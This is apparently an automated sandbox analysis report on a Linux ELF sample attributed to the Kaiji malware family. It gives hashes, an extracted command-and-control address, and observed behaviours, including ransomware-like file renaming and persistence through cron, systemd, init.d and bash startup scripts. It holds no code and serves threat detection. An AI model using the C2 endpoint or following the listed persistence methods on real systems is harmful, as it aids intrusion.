General

  • Target

    linux_386.elf

  • Size

    1.8MB

  • Sample

    250420-ptgk2aymw9

  • MD5

    f50b701a4d4f21aee1f382065ddbb519

  • SHA1

    e2c151946009bd0bb9acac03c78628a7f295a66f

  • SHA256

    1c1a71735e1d19cfb2149cd99596fdbc44a90a5c229413f710b65ee1a0942c0b

  • SHA512

    29b757fe5097051d8d9194a37dcacaf142d9988df6221dafe5216b1aa59d48722e6c0526a917d6be330247c1e5ed2a2009a1291bdaef6d7407345bbf28dce153

  • SSDEEP

    24576:Inoxw1zy7RvFMNRlnmxlJgAaI0ODBBri8wnJPVwchQItBPUgpxN2SzVVOMaWz1v:s/MBFBuEItpRpaSIWz1

Malware Config

Extracted

Family

kaiji

C2

154.201.91.52:889

Targets

    • Target

      linux_386.elf

    • Size

      1.8MB

    • MD5

      f50b701a4d4f21aee1f382065ddbb519

    • SHA1

      e2c151946009bd0bb9acac03c78628a7f295a66f

    • SHA256

      1c1a71735e1d19cfb2149cd99596fdbc44a90a5c229413f710b65ee1a0942c0b

    • SHA512

      29b757fe5097051d8d9194a37dcacaf142d9988df6221dafe5216b1aa59d48722e6c0526a917d6be330247c1e5ed2a2009a1291bdaef6d7407345bbf28dce153

    • SSDEEP

      24576:Inoxw1zy7RvFMNRlnmxlJgAaI0ODBBri8wnJPVwchQItBPUgpxN2SzVVOMaWz1v:s/MBFBuEItpRpaSIWz1

    • Renames multiple (1156) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Executes dropped EXE

    • Modifies Watchdog functionality

      Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    • Reads EFI boot settings

      Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.

    • Creates/modifies Cron job

      Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    • Creates/modifies environment variables

      Creating/modifying environment variables is a common persistence mechanism.

    • Enumerates running processes

      Discovers information about currently running processes on the system

    • Modifies init.d

      Adds/modifies system service, likely for persistence.

    • Modifies systemd

      Adds/ modifies systemd service files. Likely to achieve persistence.

    • Write file to user bin folder

    • Modifies Bash startup script

MITRE ATT&CK Enterprise v16

Tasks